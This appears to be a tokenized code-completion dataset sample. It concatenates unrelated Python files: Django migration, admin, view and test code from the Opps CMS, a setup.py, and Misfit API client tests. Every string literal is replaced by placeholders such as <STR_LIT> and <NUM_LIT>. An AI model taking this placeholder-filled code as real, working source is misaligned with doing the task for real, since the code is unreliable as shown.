'<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:source>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" % ( User . _meta . app_label , User . _meta . object_name ) } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:action>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:message>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:1>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT:4>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" % ( User . _meta . app_label , User . _meta . object_name ) } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django . conf . urls import patterns , url , include <EOL> from . views import OppsAutocompleteLookup <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , <EOL> OppsAutocompleteLookup . as_view ( ) , <EOL> name = "<STR_LIT>" ) , <EOL> ) </s>
<s> from django . contrib import admin <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django import forms <EOL> from django . contrib . auth import get_user_model <EOL> from django . contrib . sites . models import Site <EOL> from django . conf import settings <EOL> from opps . core . widgets import OppsEditor <EOL> from opps . channels . models import Channel <EOL> from . models import FlatPage <EOL> from opps . core . admin import apply_opps_rules <EOL> from opps . contrib . multisite . admin import AdminViewPermission <EOL> from opps . images . generate import image_url <EOL> class FlatPageAdminForm ( forms . ModelForm ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( FlatPageAdminForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . required = False <EOL> def clean_channel ( self ) : <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> return self . cleaned_data [ "<STR_LIT>" ] <EOL> return Channel . objects . get_homepage ( site = self . cleaned_data [ '<STR_LIT>' ] ) <EOL> class Meta : <EOL> model = FlatPage <EOL> widgets = { '<STR_LIT:content>' : OppsEditor ( ) } <EOL> @ apply_opps_rules ( '<STR_LIT>' ) <EOL> class FlatPageAdmin ( AdminViewPermission ) : <EOL> form = FlatPageAdminForm <EOL> prepopulated_fields = { "<STR_LIT>" : [ "<STR_LIT:title>" ] } <EOL> readonly_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> list_display = [ '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> raw_id_fields = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> fieldsets = ( <EOL> ( _ ( u'<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:title>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) , <EOL> ( _ ( u'<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT:content>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) } ) , <EOL> ( _ ( u'<STR_LIT>' ) , { <EOL> '<STR_LIT>' : ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) , <EOL> ) <EOL> def image_thumb ( self , obj ) : <EOL> if obj . main_image : <EOL> return u'<STR_LIT>' . format ( <EOL> image_url ( obj . main_image . archive . url , width = <NUM_LIT> , height = <NUM_LIT> ) ) <EOL> return _ ( u'<STR_LIT>' ) <EOL> image_thumb . short_description = _ ( u'<STR_LIT>' ) <EOL> image_thumb . allow_tags = True <EOL> def save_model ( self , request , obj , form , change ) : <EOL> if getattr ( obj , '<STR_LIT>' , None ) is None : <EOL> obj . user = get_user_model ( ) . objects . get ( pk = request . user . pk ) <EOL> obj . site = Site . objects . get ( pk = settings . SITE_ID ) <EOL> if not obj . channel : <EOL> obj . channel = Channel . objects . get_homepage ( site = obj . site ) <EOL> obj . save ( ) <EOL> admin . site . register ( FlatPage , FlatPageAdmin ) </s>
<s> from django . http import Http404 <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . utils import timezone <EOL> from django import template <EOL> from django . conf import settings <EOL> from django . contrib . sites . models import get_current_site <EOL> from opps . articles . models import Album <EOL> from opps . containers . models import Container , ContainerBox <EOL> from opps . channels . models import Channel <EOL> from opps . fields . utils import field_template_read <EOL> class View ( object ) : <EOL> context_object_name = "<STR_LIT>" <EOL> paginate_by = settings . OPPS_PAGINATE_BY <EOL> limit = settings . OPPS_VIEWS_LIMIT <EOL> page_kwarg = '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . slug = None <EOL> self . channel = None <EOL> self . long_slug = None <EOL> self . article = None <EOL> self . child_class = u'<STR_LIT>' <EOL> self . excluded_ids = set ( ) <EOL> self . channel_long_slug = [ ] <EOL> super ( View , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_channel_descendants_lookup ( self ) : <EOL> """<STR_LIT>""" <EOL> obj = { '<STR_LIT>' : self . channel . tree_id } <EOL> if self . channel : <EOL> if self . __class__ . __module__ == "<STR_LIT>" : <EOL> obj [ '<STR_LIT>' ] = self . channel . lft <EOL> obj [ '<STR_LIT>' ] = self . channel . rght <EOL> elif self . __class__ . __module__ == "<STR_LIT>" : <EOL> obj [ '<STR_LIT>' ] = self . channel . lft <EOL> obj [ '<STR_LIT>' ] = self . channel . rght <EOL> return obj <EOL> def get_paginate_by ( self , queryset ) : <EOL> queryset = self . get_queryset ( ) <EOL> setting_name = '<STR_LIT>' . format ( queryset . <EOL> model . _meta . app_label , <EOL> queryset . model . <EOL> __name__ ) . upper ( ) <EOL> by_settings = getattr ( settings , setting_name , self . paginate_by ) <EOL> by_request = self . request . GET . get ( '<STR_LIT>' ) <EOL> by_channel = getattr ( self . channel , '<STR_LIT>' , None ) <EOL> return by_request or by_channel or by_settings <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = { } <EOL> self . channel = self . channel or Channel . objects . get_homepage ( <EOL> site = get_current_site ( self . request ) <EOL> ) <EOL> if not self . channel and getattr ( <EOL> settings , '<STR_LIT>' , None ) : <EOL> self . channel = Channel . objects . filter ( <EOL> homepage = True , published = True ) [ : <NUM_LIT:1> ] . get ( ) <EOL> context [ '<STR_LIT>' ] = self . channel <EOL> if not self . long_slug : <EOL> return context <EOL> context = super ( View , self ) . get_context_data ( ** kwargs ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> context [ '<STR_LIT>' ] = self . articleboxes <EOL> else : <EOL> context [ '<STR_LIT>' ] = ContainerBox . objects . filter ( <EOL> channel__long_slug = self . long_slug ) <EOL> self . excluded_ids = [ ] <EOL> for box in context [ '<STR_LIT>' ] : <EOL> self . excluded_ids += [ a . pk for a in box . ordered_containers ( ) ] <EOL> obj_filter = { } <EOL> obj_filter [ '<STR_LIT>' ] = self . site . domain <EOL> obj_filter [ '<STR_LIT>' ] = timezone . now ( ) <EOL> obj_filter [ '<STR_LIT>' ] = True <EOL> filters = obj_filter <EOL> filters [ '<STR_LIT>' ] = self . channel_long_slug <EOL> is_paginated = self . page_kwarg in self . request . GET <EOL> if self . channel and self . channel . is_root_node ( ) and not is_paginated : <EOL> filters [ '<STR_LIT>' ] = True <EOL> article = Container . objects . filter ( ** filters ) <EOL> context [ '<STR_LIT>' ] = article . filter ( <EOL> child_class = '<STR_LIT>' <EOL> ) . exclude ( pk__in = self . excluded_ids ) [ : self . limit ] <EOL> context [ '<STR_LIT>' ] = Album . objects . filter ( <EOL> ** filters <EOL> ) . exclude ( pk__in = self . excluded_ids ) [ : self . limit ] <EOL> context [ '<STR_LIT>' ] = { } <EOL> context [ '<STR_LIT>' ] [ '<STR_LIT>' ] = self . long_slug <EOL> if self . channel : <EOL> context [ '<STR_LIT>' ] = self . channel <EOL> context [ '<STR_LIT>' ] = self . get_breadcrumb ( ) <EOL> if self . slug : <EOL> try : <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) . get_next_by_date_insert ( ** obj_filter ) <EOL> except self . get_object ( ) . DoesNotExist : <EOL> pass <EOL> try : <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) . get_previous_by_date_insert ( ** obj_filter ) <EOL> except self . get_object ( ) . DoesNotExist : <EOL> pass <EOL> context [ '<STR_LIT>' ] = context [ '<STR_LIT>' ] . filter ( <EOL> containers__slug = self . slug ) <EOL> if self . get_object ( ) . child_class == '<STR_LIT>' : <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) . container <EOL> if self . request . META . get ( '<STR_LIT>' , False ) or self . request . is_ajax ( ) : <EOL> context [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> try : <EOL> context [ '<STR_LIT>' ] . fields = field_template_read ( <EOL> context [ '<STR_LIT>' ] . custom_fields ( ) ) <EOL> except AttributeError : <EOL> pass <EOL> return context <EOL> def get_template_folder ( self ) : <EOL> domain_folder = "<STR_LIT>" <EOL> if self . site . id > <NUM_LIT:1> : <EOL> domain_folder = "<STR_LIT>" . format ( self . site . domain ) <EOL> return domain_folder <EOL> def get_long_slug ( self ) : <EOL> self . long_slug = self . kwargs . get ( '<STR_LIT>' , None ) <EOL> try : <EOL> if not self . long_slug : <EOL> self . long_slug = Channel . objects . get_homepage ( <EOL> site = self . site ) . long_slug <EOL> except AttributeError : <EOL> pass <EOL> return self . long_slug <EOL> def set_channel_rules ( self ) : <EOL> self . fallback = getattr ( settings , '<STR_LIT>' , False ) <EOL> filters = dict ( <EOL> site__domain = self . site . domain , <EOL> long_slug = self . long_slug , <EOL> date_available__lte = timezone . now ( ) , <EOL> published = True <EOL> ) <EOL> try : <EOL> self . channel = Channel . objects . get ( ** filters ) <EOL> except Channel . DoesNotExist : <EOL> if not self . fallback or self . site == self . site_master : <EOL> raise Http404 ( '<STR_LIT>' ) <EOL> filters [ '<STR_LIT>' ] = self . site_master . domain <EOL> self . channel = get_object_or_404 ( Channel , ** filters ) <EOL> self . long_slug = self . channel . long_slug <EOL> self . channel_long_slug = [ self . long_slug ] <EOL> self . channel_descendants = self . channel . get_descendants ( <EOL> include_self = False ) <EOL> for children in self . channel_descendants : <EOL> self . channel_long_slug . append ( children . long_slug ) <EOL> def get_breadcrumb ( self ) : <EOL> try : <EOL> if self . channel . is_root_node ( ) : <EOL> return [ ] <EOL> except : <EOL> return [ ] <EOL> return self . channel . get_ancestors ( include_self = True ) <EOL> def check_template ( self , _template ) : <EOL> try : <EOL> template . loader . get_template ( _template ) <EOL> return True <EOL> except template . TemplateDoesNotExist : <EOL> return False </s>
<s> from django . test import TestCase <EOL> from opps . fields . utils import field_template_read <EOL> class FieldTemplateReadlTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . dict = { "<STR_LIT>" : "<STR_LIT:1>" } <EOL> self . dict_out = { "<STR_LIT>" : "<STR_LIT:1>" } <EOL> def test_self_dict ( self ) : <EOL> read_on_template = field_template_read ( self . dict ) <EOL> self . assertNotEqual ( self . dict , self . dict_out ) <EOL> self . assertTrue ( read_on_template ) <EOL> self . assertEqual ( read_on_template , self . dict_out ) <EOL> def test_empty_dict ( self ) : <EOL> """<STR_LIT>""" <EOL> read_on_template = field_template_read ( { } ) <EOL> self . assertFalse ( read_on_template ) <EOL> self . assertEqual ( read_on_template , { } ) <EOL> def test_down_case ( self ) : <EOL> read_on_template = field_template_read ( self . dict_out ) <EOL> self . assertEqual ( read_on_template , self . dict_out ) </s>
<s> from django . contrib . auth import views as auth_views <EOL> from . import forms <EOL> def password_reset_confirm ( * args , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , forms . SetPasswordForm ) <EOL> return auth_views . password_reset_confirm ( * args , ** kwargs ) <EOL> def password_change ( * args , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , forms . PasswordChangeForm ) <EOL> return auth_views . password_change ( * args , ** kwargs ) </s>
<s> import re <EOL> from setuptools import setup <EOL> required = [ line for line in open ( '<STR_LIT>' ) . read ( ) . split ( "<STR_LIT:\n>" ) if line != '<STR_LIT>' ] <EOL> required_test = [ line for line in open ( '<STR_LIT>' ) . read ( ) . split ( "<STR_LIT:\n>" ) if not line . startswith ( "<STR_LIT>" ) and line != '<STR_LIT>' ] <EOL> fbinit = open ( '<STR_LIT>' ) . read ( ) <EOL> author = re . search ( "<STR_LIT>" , fbinit ) . group ( <NUM_LIT:1> ) <EOL> author_email = re . search ( "<STR_LIT>" , fbinit ) . group ( <NUM_LIT:1> ) <EOL> version = re . search ( "<STR_LIT>" , fbinit ) . group ( <NUM_LIT:1> ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> author = author , <EOL> author_email = author_email , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> include_package_data = True , <EOL> install_requires = [ "<STR_LIT>" ] + required , <EOL> license = '<STR_LIT>' , <EOL> test_suite = '<STR_LIT>' , <EOL> tests_require = required_test , <EOL> classifiers = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ) , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> import arrow <EOL> import json <EOL> import unittest <EOL> import sys <EOL> from httmock import HTTMock <EOL> from nose . tools import eq_ <EOL> from misfit import Misfit , MisfitGoal , MisfitSummary <EOL> from misfit . exceptions import MisfitException <EOL> from . mocks import MisfitHttMock <EOL> class TestMisfitAPI ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . misfit = Misfit ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_goal ( self ) : <EOL> """<STR_LIT>""" <EOL> goal_dict = { <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT:date>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1000> , <EOL> "<STR_LIT>" : - <NUM_LIT:8> <EOL> } <EOL> end_date = '<STR_LIT>' <EOL> with HTTMock ( MisfitHttMock ( '<STR_LIT>' ) . json_http ) : <EOL> goal_list = self . misfit . goal ( start_date = goal_dict [ '<STR_LIT:date>' ] , <EOL> end_date = end_date ) <EOL> eq_ ( len ( goal_list ) , <NUM_LIT:3> ) <EOL> goal = goal_list [ <NUM_LIT:0> ] <EOL> eq_ ( type ( goal ) , MisfitGoal ) <EOL> self . assert_misfit_string ( goal , goal_dict ) <EOL> eq_ ( goal_list [ <NUM_LIT:2> ] . date , arrow . get ( end_date ) ) <EOL> eq_ ( goal . id , goal_dict [ '<STR_LIT:id>' ] ) <EOL> eq_ ( goal . date , arrow . get ( goal_dict [ '<STR_LIT:date>' ] ) ) <EOL> eq_ ( goal . points , goal_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( goal . targetPoints , goal_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( goal . timeZoneOffset , goal_dict [ '<STR_LIT>' ] ) <EOL> self . assertAlmostEqual ( goal . percent_complete ( ) , <NUM_LIT:50> ) <EOL> goal . targetPoints = <NUM_LIT:0> <EOL> assert goal . percent_complete ( ) is None <EOL> def test_goal_single ( self ) : <EOL> """<STR_LIT>""" <EOL> goal_dict = { <EOL> "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT:date>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1000> , <EOL> "<STR_LIT>" : - <NUM_LIT:8> <EOL> } <EOL> with HTTMock ( MisfitHttMock ( '<STR_LIT>' ) . json_http ) : <EOL> goal = self . misfit . goal ( object_id = goal_dict [ '<STR_LIT:id>' ] ) <EOL> eq_ ( type ( goal ) , MisfitGoal ) <EOL> self . assert_misfit_string ( goal , goal_dict ) <EOL> eq_ ( goal . id , goal_dict [ '<STR_LIT:id>' ] ) <EOL> eq_ ( goal . date , arrow . get ( goal_dict [ '<STR_LIT:date>' ] ) ) <EOL> eq_ ( goal . points , goal_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( goal . targetPoints , goal_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( goal . timeZoneOffset , goal_dict [ '<STR_LIT>' ] ) <EOL> self . assertAlmostEqual ( goal . percent_complete ( ) , <NUM_LIT:50> ) <EOL> goal . targetPoints = <NUM_LIT:0> <EOL> assert goal . percent_complete ( ) is None <EOL> def test_goal_object_date_exception ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( MisfitException , self . misfit . goal ) <EOL> def test_summary ( self ) : <EOL> """<STR_LIT>""" <EOL> date_range = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> with HTTMock ( MisfitHttMock ( '<STR_LIT>' ) . json_http ) : <EOL> summary = self . misfit . summary ( start_date = '<STR_LIT>' , <EOL> end_date = '<STR_LIT>' ) <EOL> summ_dict = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> <EOL> } <EOL> eq_ ( type ( summary ) , MisfitSummary ) <EOL> self . assert_misfit_string ( summary , summ_dict ) <EOL> eq_ ( summary . data , summ_dict ) <EOL> eq_ ( summary . activityCalories , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . calories , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . distance , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . points , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . steps , summ_dict [ '<STR_LIT>' ] ) <EOL> def test_summary_detail ( self ) : <EOL> summ_dict = { <EOL> "<STR_LIT:date>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> <EOL> } <EOL> end_date = "<STR_LIT>" <EOL> with HTTMock ( MisfitHttMock ( '<STR_LIT>' ) . json_http ) : <EOL> summary_list = self . misfit . summary ( <EOL> start_date = summ_dict [ '<STR_LIT:date>' ] , end_date = end_date , detail = True ) <EOL> eq_ ( len ( summary_list ) , <NUM_LIT:3> ) <EOL> summary = summary_list [ <NUM_LIT:0> ] <EOL> eq_ ( type ( summary ) , MisfitSummary ) <EOL> self . assert_misfit_string ( summary , summ_dict ) <EOL> eq_ ( summary_list [ <NUM_LIT:2> ] . date , arrow . get ( end_date ) ) <EOL> eq_ ( summary . data , summ_dict ) <EOL> eq_ ( summary . date , arrow . get ( summ_dict [ '<STR_LIT:date>' ] ) ) <EOL> eq_ ( summary . points , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . steps , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . calories , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . activityCalories , summ_dict [ '<STR_LIT>' ] ) <EOL> eq_ ( summary . distance , summ_dict [ '<STR_LIT>' ] ) <EOL> def assert_misfit_string ( self , obj , data ) : <EOL> """<STR_LIT>""" <EOL> parts = ( '<STR_LIT:%s>' % obj ) . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> eq_ ( parts [ <NUM_LIT:0> ] , '<STR_LIT:%s>' % type ( obj ) ) <EOL> eq_ ( json . loads ( parts [ <NUM_LIT:1> ] ) , data ) </s>
